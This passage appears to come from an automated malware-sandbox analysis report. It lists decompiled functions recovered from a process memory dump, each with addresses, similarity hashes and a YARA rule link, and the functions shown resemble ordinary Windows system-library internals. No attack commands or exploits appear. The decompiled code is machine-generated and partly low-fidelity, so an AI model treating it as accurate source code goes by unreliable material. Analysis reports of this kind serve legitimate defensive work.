				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04B87D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04bffe96
0x04bffe9e
0x04bffea1
0x04bffead
0x04bffeb3
0x04bffeb9
0x04bffec3
0x04bffed5
0x04bffec5
0x04bffece
0x04bffece
0x04bffee0
0x04bffee1
0x04bffee3
0x04bffee8
0x04bffefb

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af21f473825a73161bfb7833710b507ac892b34c927804b0bfe023d1d249158
Instruction ID: 8c31f4c246f3b5bd0089d1b4c6732b1e4bdeafa1a5e00be49ea5b727be8d83e6
Opcode Fuzzy Hash: 8af21f473825a73161bfb7833710b507ac892b34c927804b0bfe023d1d249158
Instruction Fuzzy Hash: F0016270A04208EFCB14DFA8D941A6EB7F4EF04304F14459AB919EB382DA35E901CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04C38F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04C38F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4c5d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04B87D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04c38f6a
0x04c38f79
0x04c38f81
0x04c38f84
0x04c38f8b
0x04c38f91
0x04c38f94
0x04c38f9e
0x04c38fb0
0x04c38fa0
0x04c38fa9
0x04c38fa9
0x04c38fbb
0x04c38fbc
0x04c38fbe
0x04c38fc3
0x04c38fd6

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79ed67c9e0456445ef6508468e25f9f94920a491e8c1948e50c89137cc2f721
Instruction ID: e8d732dd6647bab71cda62edf53add9de7fdba0a4f0e3a1bb24e72d024cb02a2
Opcode Fuzzy Hash: f79ed67c9e0456445ef6508468e25f9f94920a491e8c1948e50c89137cc2f721
Instruction Fuzzy Hash: C7014474A0420CAFDB04EFA8D545AAEB7F4EF08704F10449AF915EB380EA34EA10DB94

Uniqueness

Uniqueness Score: -1.00%

Function 04C2131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04C2131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4c5d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04B87D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04c2131b
0x04c2132a
0x04c21330
0x04c21336
0x04c2133e
0x04c21341
0x04c21344
0x04c2134f
0x04c21361
0x04c21351
0x04c2135a
0x04c2135a
0x04c2136c
0x04c2136d
0x04c2136f
0x04c21374
0x04c21387

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5014f476aa039a8ee02a1e3eda328304404b58f16f348fd2010b41a29e3ec5
Instruction ID: 9a91c4a03f3b2ef8873cd0d5d4cd40fe71223f1903177f5dfe8a0f2ac35cc089
Opcode Fuzzy Hash: 1e5014f476aa039a8ee02a1e3eda328304404b58f16f348fd2010b41a29e3ec5
Instruction Fuzzy Hash: 6E018170E04258AFCB04EFA9D505AAEB7F4FF08300F04409AF845EB341EA74EA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04C21608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04C21608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4c5d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04B87D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x04c21608
0x04c21617
0x04c2161d
0x04c21625
0x04c21628
0x04c2162b
0x04c21636
0x04c21648
0x04c21638
0x04c21641
0x04c21641
0x04c21653
0x04c21654
0x04c21656
0x04c2165b
0x04c2166e

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc6d45e581aae42e05581adacee4ff4d5bc3f0653d6fdfd31f8e7206e3f236da
Instruction ID: 52dbda31df64b11f17ac5d7f58c3f0ecdf2ad8944b56d3d91572ff6c3b3c76cb
Opcode Fuzzy Hash: cc6d45e581aae42e05581adacee4ff4d5bc3f0653d6fdfd31f8e7206e3f236da
Instruction Fuzzy Hash: 7EF06271E04258EFDB14EFA9D505A6EB7F4EF04300F0440A9F915EB381EA74EA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04B8C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B8C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04B8C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4b411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04C388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x04b8c577
0x04b8c57d
0x04b8c581
0x04b8c5b5
0x04b8c5b9
0x04b8c5ce
0x04b8c5ce
0x04b8c5ca
0x00000000
0x04b8c5ca
0x04b8c5c4
0x04b8c5c8
0x00000000
0x00000000
0x00000000
0x04b8c5ad
0x00000000
0x04b8c5af

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e03d9bebff1bdb540d893396632459de5ad843fedaf043fa3694d9eeaf49d69
Instruction ID: 586fbc535c7693472258470f9fa0dfe269a4f61942c3597663c8d7d9144658a8
Opcode Fuzzy Hash: 3e03d9bebff1bdb540d893396632459de5ad843fedaf043fa3694d9eeaf49d69
Instruction Fuzzy Hash: DDF090F29156909EEF31BB188005BA27FF4DB05774F4484EEE40587502D7A4F880C371

Uniqueness

Uniqueness Score: -1.00%

Function 04C22073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04C22073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04C1FD22(__ecx);
				_t19 =  *0x4c5849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4c58748; // 0x0
					if(__eflags <= 0) {
						E04C21C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4c58724 & 0x00000004;
							if(( *0x4c58724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4c58724; // 0x0
					return E04C18DF1(__ebx, 0xc0000374, 0x4c55890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x04c22076
0x04c22078
0x04c2207d
0x04c22083
0x04c220a4
0x04c220aa
0x04c220ac
0x04c220b7
0x04c220ba
0x04c220bc
0x04c220c9
0x04c220c9
0x04c220d0
0x04c220d2
0x00000000
0x04c220d2
0x04c220be
0x04c220c3
0x04c220c5
0x04c220c7
0x00000000
0x00000000
0x04c220c7
0x04c220bc
0x04c220d4
0x04c22085
0x04c22085
0x04c220a3
0x04c220a3

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21803f4df370e24dd461f7629ad8e5c1491beef231dcdf64071a275d3ca842e7
Instruction ID: 62414ff9ff8b86b6689a87cfc89e2cddb591cfc96bf3cc194ddf3b6ec4cc09ca
Opcode Fuzzy Hash: 21803f4df370e24dd461f7629ad8e5c1491beef231dcdf64071a275d3ca842e7
Instruction Fuzzy Hash: 87F0A77E4156A44AEF327F2562113E52B96D746154F0904C5E8502B204C9B8AED3DB74

Uniqueness

Uniqueness Score: -1.00%

Function 04C38D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04C38D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4c5d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04B87D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04c38d34
0x04c38d43
0x04c38d4b
0x04c38d4e
0x04c38d52
0x04c38d5c
0x04c38d6e
0x04c38d5e
0x04c38d67
0x04c38d67
0x04c38d79
0x04c38d7a
0x04c38d7c
0x04c38d81
0x04c38d94

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51d52178561a4425bcb36a3b2886eb48ce0e6e907749ae28c073e0182fd0b4c
Instruction ID: 24c35f81677df4440e2111e1120aa1389a092388cd589861a9bb8714d5d5cbf8
Opcode Fuzzy Hash: f51d52178561a4425bcb36a3b2886eb48ce0e6e907749ae28c073e0182fd0b4c
Instruction Fuzzy Hash: 85F09070A046089FDB04EFA8D541A6EB7B4EB04304F508099F915AB280EA34F900C754

Uniqueness

Uniqueness Score: -1.00%

Function 04BA927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04BA927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04BAFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04BA92C6(_t11, _t14);
				}
				return _t11;
			}

0x04ba9295
0x04ba9299
0x04ba929f
0x04ba92aa
0x04ba92ad
0x04ba92ae
0x04ba92af
0x04ba92b0
0x04ba92b4
0x04ba92bb
0x04ba92bb
0x04ba92c5

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 9461ed9c4a78ed4275cddf3def79632a664b8cdb3ed511259de3400d41d4f6d7
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: BBE02B723406002BEB119E45CC80F53376DDF82728F0040BCB5001F242C6F5EC1987A0

Uniqueness

Uniqueness Score: -1.00%

Function 04C38CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04C38CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4c5d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04B87D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04c38ce5
0x04c38ced
0x04c38cf0
0x04c38cfb
0x04c38d0d
0x04c38cfd
0x04c38d06
0x04c38d06
0x04c38d18
0x04c38d19
0x04c38d1b
0x04c38d20
0x04c38d33

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c98825754c70ebcdd4946d00a9241d02f3c8d4c1e55f938c748439de670fd0
Instruction ID: fd13647a0848e09bfac895b13c3a7563548cfd023b517022a0f5b460fd485201
Opcode Fuzzy Hash: 72c98825754c70ebcdd4946d00a9241d02f3c8d4c1e55f938c748439de670fd0
Instruction Fuzzy Hash: 13F08970A046099BDB04EBB9D945E6E77B4EF04304F140199F515EB280E934F900D754

Uniqueness

Uniqueness Score: -1.00%

Function 04B8746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04B8746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04B7EB70(__ecx, 0x4c579a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04BA95D0();
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x04b8746d
0x04b8746d
0x04b8746d
0x04b87471
0x04b87488
0x04bcf92d
0x04b8748e
0x04b87491
0x04b87495
0x04bcf937
0x04bcf93a
0x04bcf94e
0x04bcf953
0x04bcf956
0x04bcf956
0x04b87495
0x00000000
0x04b87488
0x04b87473
0x04b87478
0x04b8747d
0x04b87481
0x00000000
0x04b87481
0x04b8747d
0x04b8747a
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9a6ee92ba39416fdf22a9722a2e3f785047334bd4550db843642a2dc72b1d7
Instruction ID: 8e49845d77c2ae1fd51f180b2e24a4a1b0709929a54ba395053e80c98959da3c
Opcode Fuzzy Hash: 9e9a6ee92ba39416fdf22a9722a2e3f785047334bd4550db843642a2dc72b1d7
Instruction Fuzzy Hash: B3F09034604148EADF01BA6CCC80B797BA2AF0429CF2845DDD865A7160EB64F800D685

Uniqueness

Uniqueness Score: -1.00%

Function 04B64F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B64F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04C388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04B8C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4b41030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x04b64f2e
0x04b64f34
0x04b64f38
0x04bc0b85
0x04bc0b85
0x04bc0b89
0x04bc0b9a
0x04bc0b9a
0x04bc0b9f
0x00000000
0x04bc0b9f
0x04bc0b94
0x04bc0b98
0x00000000
0x00000000
0x00000000
0x04bc0b98
0x04b64f3e
0x04b64f48
0x00000000
0x04b64f6e
0x00000000
0x04b64f70

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff179207ee17af7b3d8e5af47af430d4411c6f0e2ead1a9acf117c7bcc60ae1
Instruction ID: 09dda09e433bbca1fb88da06358983bd0eb945e991894653e06fdaa247836fba
Opcode Fuzzy Hash: dff179207ee17af7b3d8e5af47af430d4411c6f0e2ead1a9acf117c7bcc60ae1
Instruction Fuzzy Hash: CBF0BE3292A694CFE761EBA8C284B22B7E4EB087BCF0445E8D40587A20C724F880C660

Uniqueness

Uniqueness Score: -1.00%

Function 04C38B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04C38B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4c5d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04B87D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04c38b67
0x04c38b6f
0x04c38b72
0x04c38b7d
0x04c38b8f
0x04c38b7f
0x04c38b88
0x04c38b88
0x04c38b9a
0x04c38b9b
0x04c38b9d
0x04c38ba2
0x04c38bb5

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1044e19f8c76a642b043644c79e1a9ec51ea9e0dafe5f2a774d2edc14a0e223
Instruction ID: cd9662ac911be3fe02b3be5c580e8db3df72dbb20906605f51688b4510a368f0
Opcode Fuzzy Hash: f1044e19f8c76a642b043644c79e1a9ec51ea9e0dafe5f2a774d2edc14a0e223
Instruction Fuzzy Hash: 58F089B0A042599BDB04EBA8D905E6E73B4EF04304F5404D9F915DB380EA34E900C754

Uniqueness

Uniqueness Score: -1.00%

Function 04B9A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B9A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4c57b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04BAFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x04b9a44b
0x04b9a453
0x04b9a472
0x04b9a476
0x00000000
0x04b9a493
0x04b9a47a
0x04b9a47f
0x04b9a486
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dfbed817b9d4e4826447784320e2ba3ab1a6731c95313d24f59708362807ab5
Instruction ID: 4f10b6e3b7a1423d154b6d39aeca1e3734aaaf1e1d78e7a3111c2c1034eb505b
Opcode Fuzzy Hash: 9dfbed817b9d4e4826447784320e2ba3ab1a6731c95313d24f59708362807ab5
Instruction Fuzzy Hash: DCE09272B01421ABD2115A58EC40FA673ADDBD4A55F0A4079E504D7210E628ED52C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 04B6F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04B6F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04B9F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04B84620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x04b6f35d
0x04b6f361
0x04b6f367
0x04b6f372
0x04b6f38c
0x04b6f38c
0x04b6f394

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: c12ac0e41f25d03178a7f1647e3ac947ece390fca63ff145339ced8d74705636
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 9FE0D832A40218BBDB31A6DDAD05F6ABBACDB44B60F0001D5B904D7150D574AD00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 04B7FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B7FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4b411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04C388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04B80050(_t14);
				}
			}

0x04b7ff66
0x04b7ff6b
0x00000000
0x04b7ff8f
0x00000000
0x04b7ff8f

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02250209b19f229835ec4c32e9f0ac54c6b14a9c7c55b8d52d006edbd0d0be18
Instruction ID: 53799699c46eb71243a21609f7159409f437bc4a0ac7c902dc63cb45505b3efd
Opcode Fuzzy Hash: 02250209b19f229835ec4c32e9f0ac54c6b14a9c7c55b8d52d006edbd0d0be18
Instruction Fuzzy Hash: FFE09AB160B2049EE734EB65D060F35379CDB42665F1A809DE0188F501CA21F880D21A

Uniqueness

Uniqueness Score: -1.00%

Function 04BF41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04BF41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4c408f0);
				_t5 = E04BBD08C(__ebx, __edi, __esi);
				if( *0x4c587ec == 0) {
					E04B7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4c587ec == 0) {
						 *0x4c587f0 = 0x4c587ec;
						 *0x4c587ec = 0x4c587ec;
						 *0x4c587e8 = 0x4c587e4;
						 *0x4c587e4 = 0x4c587e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04BF4248();
				}
				return E04BBD0D1(_t5);
			}

0x04bf41e8
0x04bf41ea
0x04bf41ef
0x04bf41fb
0x04bf4206
0x04bf420b
0x04bf4216
0x04bf421d
0x04bf4222
0x04bf422c
0x04bf4231
0x04bf4231
0x04bf4236
0x04bf423d
0x04bf423d
0x04bf4247

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
